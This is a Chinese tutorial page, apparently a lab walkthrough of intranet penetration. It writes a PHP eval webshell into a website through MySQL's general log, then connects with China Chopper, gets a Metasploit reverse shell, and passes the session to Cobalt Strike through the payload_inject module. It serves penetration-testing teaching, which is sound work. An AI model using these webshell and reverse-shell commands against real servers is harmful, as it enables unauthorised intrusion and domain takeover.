主页 > 网络知识 > 内网渗透实战技巧(2)

内网渗透实战技巧(2)

执行以下命令

set global general_log=on;                                     #开启日志 set global general_log_file='C:/phpstudy/www/yxcms/hack.php';  #设置指定文件为网站日志存放文件 SELECT '<?php eval($_POST["cmd"]);?>'               #执行该语句,会将该命令写入日志文件中

点击并拖拽以移动

最后用菜刀连接,如下。

 

内网渗透实战技巧

 

后渗透第一步

在拿到了Web服务器的权限后,我们就要尽可能多的搜集该服务器的信息,然后搭建隧道通往内网!

执行以下命令我们知道当前的用户身份是 administrator ,在管理员组中,并且处在域 god 中。该主机有两张网卡,分别是:192.168.10.14,192.168.52.143。由此可知,其实获得的这个权限就是域管理员权限。(搞不懂环境为啥要以域管理员账号登录,为啥不以本地普通用户登录??)

 

内网渗透实战技巧

 

 

内网渗透实战技巧

 

现在我们想反弹一个MSF的shell。将MSF生成的木马上传到该主机上,执行,反弹成功!

 

内网渗透实战技巧

 

派生CobaltStrike权限

首先在CobaltStrike上开启一个监听

 

内网渗透实战技巧

 

然后在MSF中执行以下操作,我们的CobaltStrike就接收到反弹过来的shell了。

use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true   #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true set lhost xxxx                 #cobaltstrike监听的ip set lport 14444                 #cobaltstrike监听的端口 set session 1                   #这里是获得的session的id exploit

 

点击并拖拽以移动

内网渗透实战技巧

点击并拖拽以移动

 

获得System权限

这里由于获得的直接是adminsitrator权限,所以可以直接提到system。在真实环境中,这里很多时候都是一个普通用户权限,需要我们去提权。

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!